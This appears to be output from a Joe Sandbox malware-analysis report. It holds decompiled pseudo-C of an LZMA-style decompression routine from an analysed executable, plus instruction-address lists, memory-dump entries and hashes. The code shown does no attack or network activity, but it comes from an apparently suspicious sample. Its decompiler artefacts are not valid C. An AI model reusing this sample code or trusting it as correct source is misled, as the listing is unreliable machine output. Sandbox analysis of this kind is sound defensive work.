											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												L124:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















                0x004064b8
                0x004064b8
                0x004064b8
                0x004064b8
                0x004064be
                0x004064c2
                0x004064c6
                0x004064d0
                0x004064de
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x004067eb
                0x004067eb
                0x004067ef
                0x00000000
                0x00000000
                0x004067f1
                0x004067fa
                0x00406800
                0x00406803
                0x00406806
                0x00406809
                0x0040680c
                0x00406812
                0x0040682b
                0x0040682e
                0x0040683a
                0x0040683b
                0x0040683e
                0x00406814
                0x00406814
                0x00406823
                0x00406826
                0x00406826
                0x00406848
                0x004067e8
                0x004067e8
                0x004067e8
                0x004067eb
                0x004067ef
                0x00000000
                0x00000000
                0x00000000
                0x0040684a
                0x0040684a
                0x004067c3
                0x004067c7
                0x004068ff
                0x004068ff
                0x00406909
                0x00406911
                0x00406918
                0x0040691a
                0x00406921
                0x00406925
                0x00406925
                0x004067cd
                0x004067d3
                0x004067da
                0x004067e2
                0x004067e2
                0x004067e5
                0x00000000
                0x004067e5
                0x0040684f
                0x0040685c
                0x0040685f
                0x0040676b
                0x0040676b
                0x0040676b
                0x00405f07
                0x00405f07
                0x00405f07
                0x00405f10
                0x00000000
                0x00000000
                0x00405f16
                0x00405f16
                0x00000000
                0x00405f1d
                0x00405f21
                0x00000000
                0x00000000
                0x00405f27
                0x00405f2a
                0x00405f2d
                0x00405f30
                0x00405f34
                0x00000000
                0x00000000
                0x00405f3a
                0x00405f3a
                0x00405f3d
                0x00405f3f
                0x00405f40
                0x00405f43
                0x00405f45
                0x00405f46
                0x00405f48
                0x00405f4b
                0x00405f50
                0x00405f55
                0x00405f5e
                0x00405f71
                0x00405f74
                0x00405f80
                0x00405fa8
                0x00405faa
                0x00405fb8
                0x00405fb8
                0x00405fbc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405fac
                0x00405fac
                0x00405faf
                0x00405fb0
                0x00405fb0
                0x00000000
                0x00405fac
                0x00405f82
                0x00405f86
                0x00405f8b
                0x00405f8b
                0x00405f94
                0x00405f9c
                0x00405f9f
                0x00000000
                0x00405fa5
                0x00405fa5
                0x00000000
                0x00405fa5
                0x00000000
                0x00405fc2
                0x00405fc2
                0x00405fc6
                0x00406872
                0x00406872
                0x00000000
                0x00406872
                0x00405fcc
                0x00405fcf
                0x00405fdf
                0x00405fe2
                0x00405fe5
                0x00405fe5
                0x00405fe5
                0x00405fe8
                0x00405fec
                0x00000000
                0x00000000
                0x00405fee
                0x00405fee
                0x00405ff4
                0x0040601e
                0x00406024
                0x0040602b
                0x00000000
                0x0040602b
                0x00405ff6
                0x00405ffa
                0x00405ffd
                0x00406002
                0x00406002
                0x0040600d
                0x00406015
                0x00406018
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040605d
                0x00406063
                0x00406066
                0x00406073
                0x0040607b
                0x00000000
                0x00000000
                0x00406032
                0x00406032
                0x00406036
                0x00406881
                0x00406881
                0x00000000
                0x00406881
                0x0040603c
                0x00406042
                0x0040604d
                0x0040604d
                0x0040604d
                0x00406050
                0x00406053
                0x00406056
                0x0040605b
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066f2
                0x004066f2
                0x004066f8
                0x004066fe
                0x00406704
                0x0040671e
                0x00406721
                0x00406727
                0x00406732
                0x00406732
                0x00406734
                0x00406706
                0x00406706
                0x00406715
                0x00406719
                0x00406719
                0x0040673e
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406740
                0x00406744
                0x004068f3
                0x004068f3
                0x00000000
                0x004068f3
                0x0040674a
                0x00406750
                0x00406757
                0x0040675f
                0x00406762
                0x00406765
                0x00406765
                0x0040676b
                0x0040676b
                0x00000000
                0x00000000
                0x00406083
                0x00406083
                0x00406085
                0x00406088
                0x004060f9
                0x004060f9
                0x004060fc
                0x004060ff
                0x00406106
                0x00406110
                0x00000000
                0x00406110
                0x0040608a
                0x0040608a
                0x0040608e
                0x00406091
                0x00406093
                0x00406096
                0x00406099
                0x0040609b
                0x0040609e
                0x004060a0
                0x004060a5
                0x004060a8
                0x004060ab
                0x004060af
                0x004060b6
                0x004060b9
                0x004060c0
                0x004060c4
                0x004060cc
                0x004060cc
                0x004060cc
                0x004060c6
                0x004060c6
                0x004060c6
                0x004060bb
                0x004060bb
                0x004060bb
                0x004060d0
                0x004060d3
                0x004060f1
                0x004060f1
                0x004060f3
                0x00000000
                0x004060d5
                0x004060d5
                0x004060d5
                0x004060d8
                0x004060db
                0x004060de
                0x004060e0
                0x004060e0
                0x004060e0
                0x004060e3
                0x004060e6
                0x004060e8
                0x004060e9
                0x004060ec
                0x00000000
                0x004060ec
                0x00000000
                0x00406322
                0x00406322
                0x00406326
                0x00406344
                0x00406344
                0x00406347
                0x0040634e
                0x00406351
                0x00406354
                0x00406357
                0x0040635a
                0x0040635d
                0x0040635f
                0x00406366
                0x00406367
                0x00406369
                0x0040636c
                0x0040636f
                0x00406372
                0x00406372
                0x00406377
                0x00000000
                0x00406377
                0x00406328
                0x00406328
                0x0040632b
                0x0040632e
                0x00406338
                0x00000000
                0x00000000
                0x0040638c
                0x0040638c
                0x00406390
                0x004063b3
                0x004063b6
                0x004063b9
                0x004063c3
                0x00406392
                0x00406392
                0x00406395
                0x00406398
                0x0040639b
                0x004063a8
                0x004063ab
                0x004063ab
                0x00000000
                0x00000000
                0x004063cf
                0x004063cf
                0x004063d3
                0x00000000
                0x00000000
                0x004063d9
                0x004063d9
                0x004063dd
                0x00000000
                0x00000000
                0x004063e3
                0x004063e3
                0x004063e5
                0x004063e9
                0x004063e9
                0x004063ec
                0x004063f0
                0x00000000
                0x00000000
                0x00406440
                0x00406440
                0x00406444
                0x0040644b
                0x0040644b
                0x0040644e
                0x00406451
                0x0040645b
                0x00000000
                0x0040645b
                0x00406446
                0x00406446
                0x00000000
                0x00000000
                0x00406467
                0x00406467
                0x0040646b
                0x00406472
                0x00406475
                0x00406478
                0x0040646d
                0x0040646d
                0x0040646d
                0x0040647b
                0x0040647e
                0x00406481
                0x00406481
                0x00406484
                0x00406487
                0x0040648a
                0x0040648a
                0x0040648d
                0x00406494
                0x00406499
                0x00000000
                0x00000000
                0x00406527
                0x00406527
                0x0040652b
                0x004068c9
                0x004068c9
                0x00000000
                0x004068c9
                0x00406531
                0x00406531
                0x00406534
                0x00406537
                0x0040653b
                0x0040653e
                0x00406544
                0x00406546
                0x00406546
                0x00406546
                0x00406549
                0x0040654c
                0x00000000
                0x00000000
                0x0040611c
                0x0040611c
                0x00406120
                0x0040688d
                0x0040688d
                0x00000000
                0x0040688d
                0x00406126
                0x00406126
                0x00406129
                0x0040612c
                0x00406130
                0x00406133
                0x00406139
                0x0040613b
                0x0040613b
                0x0040613b
                0x0040613e
                0x00406141
                0x00406141
                0x00406144
                0x00406147
                0x00000000
                0x00000000
                0x0040614d
                0x0040614d
                0x00406153
                0x00000000
                0x00000000
                0x00406159
                0x00406159
                0x0040615d
                0x00406160
                0x00406163
                0x00406166
                0x00406169
                0x0040616a
                0x0040616d
                0x0040616f
                0x00406175
                0x00406178
                0x0040617b
                0x0040617e
                0x00406181
                0x00406184
                0x00406187
                0x004061a3
                0x004061a6
                0x004061a9
                0x004061ac
                0x004061b3
                0x004061b7
                0x004061b9
                0x004061bd
                0x00406189
                0x00406189
                0x0040618d
                0x00406195
                0x0040619a
                0x0040619c
                0x0040619e
                0x0040619e
                0x004061c0
                0x004061c7
                0x004061ca
                0x00000000
                0x004061d0
                0x004061d0
                0x00000000
                0x004061d0
                0x00000000
                0x004061d5
                0x004061d5
                0x004061d9
                0x00406899
                0x00406899
                0x00000000
                0x00406899
                0x004061df
                0x004061df
                0x004061e2
                0x004061e5
                0x004061e9
                0x004061ec
                0x004061f2
                0x004061f4
                0x004061f4
                0x004061f4
                0x004061f7
                0x004061fa
                0x004061fa
                0x004061fa
                0x00406200
                0x00000000
                0x00000000
                0x00406202
                0x00406202
                0x00406205
                0x00406208
                0x0040620b
                0x0040620e
                0x00406211
                0x00406214
                0x00406217
                0x0040621a
                0x0040621d
                0x00406220
                0x00406238
                0x0040623b
                0x0040623e
                0x00406241
                0x00406241
                0x00406244
                0x00406248
                0x0040624a
                0x00406222
                0x00406222
                0x0040622a
                0x0040622f
                0x00406231
                0x00406233
                0x00406233
                0x0040624d
                0x00406254
                0x00406257
                0x00000000
                0x00406259
                0x00406259
                0x00000000
                0x00406259
                0x00406257
                0x0040625e
                0x0040625e
                0x0040625e
                0x0040625e
                0x00000000
                0x00000000
                0x00406299
                0x00406299
                0x0040629d
                0x004068a5
                0x004068a5
                0x00000000
                0x004068a5
                0x004062a3
                0x004062a3
                0x004062a6
                0x004062a9
                0x004062ad
                0x004062b0
                0x004062b6
                0x004062b8
                0x004062b8
                0x004062b8
                0x004062bb
                0x004062be
                0x004062be
                0x004062c4
                0x00406262
                0x00406262
                0x00406265
                0x00000000
                0x00406265
                0x004062c6
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062db
                0x004062de
                0x004062e1
                0x004062e4
                0x004062fc
                0x004062ff
                0x00406302
                0x00406305
                0x00406305
                0x00406308
                0x0040630c
                0x0040630e
                0x004062e6
                0x004062e6
                0x004062ee
                0x004062f3
                0x004062f5
                0x004062f7
                0x004062f7
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x0040631d
                0x0040631d
                0x00000000
                0x0040631d
                0x00000000
                0x004065aa
                0x004065aa
                0x004065ae
                0x004068d5
                0x004068d5
                0x00000000
                0x004068d5
                0x004065b4
                0x004065b4
                0x004065b7
                0x004065ba
                0x004065be
                0x004065c1
                0x004065c7
                0x004065c9
                0x004065c9
                0x004065c9
                0x004065cc
                0x00000000
                0x00000000
                0x0040637a
                0x0040637a
                0x0040637d
                0x00000000
                0x00000000
                0x004066b9
                0x004066b9
                0x004066bd
                0x004066df
                0x004066df
                0x004066e2
                0x004066ec
                0x004066ef
                0x004066ef
                0x00000000
                0x004066ef
                0x004066bf
                0x004066bf
                0x004066c2
                0x004066c6
                0x004066c9
                0x004066c9
                0x004066cc
                0x00000000
                0x00000000
                0x00406776
                0x00406776
                0x0040677a
                0x00406798
                0x00406798
                0x00406798
                0x00406798
                0x0040679f
                0x004067a6
                0x004067ad
                0x004067ad
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x004067c1
                0x0040677c
                0x0040677c
                0x0040677f
                0x00406782
                0x00406785
                0x0040678c
                0x004066d0
                0x004066d0
                0x004066d3
                0x00000000
                0x00000000
                0x00406867
                0x00406867
                0x0040686a
                0x0040676b
                0x0040676b
                0x0040676b
                0x00000000
                0x00406771
                0x00000000
                0x004064a1
                0x004064a1
                0x004064a3
                0x004064aa
                0x004064ab
                0x004064ad
                0x004064b0
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004067b4
                0x004067b4
                0x004067b7
                0x004067be
                0x00000000
                0x004067c1
                0x00000000
                0x00000000
                0x00000000
                0x004064e6
                0x004064e6
                0x004064e9
                0x0040651f
                0x0040651f
                0x0040664f
                0x0040664f
                0x0040664f
                0x0040664f
                0x00406652
                0x00406652
                0x00406655
                0x00406657
                0x004068e1
                0x004068e1
                0x00000000
                0x004068e1
                0x0040665d
                0x0040665d
                0x00406660
                0x00000000
                0x00000000
                0x00406666
                0x00406666
                0x0040666a
                0x0040666d
                0x0040666d
                0x0040666d
                0x00000000
                0x0040666d
                0x004064eb
                0x004064eb
                0x004064ed
                0x004064ef
                0x004064f1
                0x004064f4
                0x004064f5
                0x004064f7
                0x004064f9
                0x004064fc
                0x004064ff
                0x00406515
                0x00406515
                0x0040651a
                0x00406552
                0x00406552
                0x00406556
                0x0040657f
                0x00406582
                0x00406584
                0x0040658b
                0x0040658e
                0x00406591
                0x00406591
                0x00406596
                0x00406596
                0x00406598
                0x0040659b
                0x004065a2
                0x004065a5
                0x004065d2
                0x004065d2
                0x004065d5
                0x004065d8
                0x0040664c
                0x0040664c
                0x0040664c
                0x0040664c
                0x00000000
                0x0040664c
                0x004065da
                0x004065da
                0x004065e0
                0x004065e3
                0x004065e6
                0x004065e9
                0x004065ec
                0x004065ef
                0x004065f2
                0x004065f5
                0x004065f8
                0x004065fb
                0x00406614
                0x00406616
                0x00406619
                0x0040661a
                0x0040661d
                0x0040661f
                0x00406622
                0x00406624
                0x00406626
                0x00406629
                0x0040662b
                0x0040662e
                0x00406632
                0x00406634
                0x00406634
                0x00406635
                0x00406638
                0x0040663b
                0x004065fd
                0x004065fd
                0x00406605
                0x0040660a
                0x0040660c
                0x0040660f
                0x0040660f
                0x0040663e
                0x00406645
                0x004065cf
                0x004065cf
                0x004065cf
                0x004065cf
                0x00000000
                0x00406647
                0x00406647
                0x00000000
                0x00406647
                0x00406645
                0x00406558
                0x00406558
                0x0040655b
                0x0040655d
                0x00406560
                0x00406563
                0x00406566
                0x00406568
                0x0040656b
                0x0040656e
                0x0040656e
                0x00406571
                0x00406571
                0x00406574
                0x0040657b
                0x0040654f
                0x0040654f
                0x0040654f
                0x0040654f
                0x00000000
                0x0040657d
                0x0040657d
                0x00000000
                0x0040657d
                0x0040657b
                0x00406501
                0x00406501
                0x00406504
                0x00406506
                0x00406509
                0x00000000
                0x00000000
                0x00406268
                0x00406268
                0x0040626c
                0x004068b1
                0x004068b1
                0x00000000
                0x004068b1
                0x00406272
                0x00406272
                0x00406275
                0x00406278
                0x0040627b
                0x0040627e
                0x00406281
                0x00406284
                0x00406286
                0x00406289
                0x0040628c
                0x0040628f
                0x00406291
                0x00406291
                0x00406291
                0x00000000
                0x00000000
                0x004063f3
                0x004063f3
                0x004063f7
                0x004068bd
                0x004068bd
                0x00000000
                0x004068bd
                0x004063fd
                0x004063fd
                0x00406400
                0x00406403
                0x00406406
                0x00406408
                0x00406408
                0x00406408
                0x0040640b
                0x0040640e
                0x00406411
                0x00406414
                0x00406417
                0x0040641a
                0x0040641b
                0x0040641d
                0x0040641d
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x00406429
                0x00406429
                0x0040642c
                0x0040642e
                0x0040642e
                0x00000000
                0x00000000
                0x00406670
                0x00406670
                0x00406670
                0x00406674
                0x00000000
                0x00000000
                0x0040667a
                0x0040667a
                0x0040667d
                0x00406680
                0x00406683
                0x00406685
                0x00406685
                0x00406685
                0x00406688
                0x0040668b
                0x0040668e
                0x00406691
                0x00406694
                0x00406697
                0x00406698
                0x0040669a
                0x0040669a
                0x0040669a
                0x0040669d
                0x004066a0
                0x004066a3
                0x004066a6
                0x004066a9
                0x004066ad
                0x004066af
                0x004066b2
                0x00000000
                0x004066b4
                0x004066b4
                0x00406431
                0x00406431
                0x00000000
                0x00406431
                0x004066b2
                0x004068e7
                0x004068e7
                0x00000000
                0x00000000
                0x00405f16
                0x0040691e
                0x0040691e
                0x00000000
                0x0040691e
                0x0040676b
                0x004067eb
                0x004067b4

                Memory Dump Source
                • Source File: 00000000.00000002.475986242.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.475970133.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476012252.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476040096.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476064921.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476162524.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476171789.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.476185752.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_O1ySvN9SvL.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                • Instruction ID: fb01dad5a0cc1219e3999a8d2bb186b1e56f72b4220c9c95c749fe4814af579a
                • Opcode Fuzzy Hash: 85c2319303355fc0c7b787500bfeece2c01703876a1250618e361b8f969aa208
                • Instruction Fuzzy Hash: 0CA15471D00229CBDF28CFA8C8447ADBBB1FB44305F15816AD856BB281D7785A96DF44
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004066B9 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                Download Yara Rule
                C-Code - Quality: 98%
                			E004066B9() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
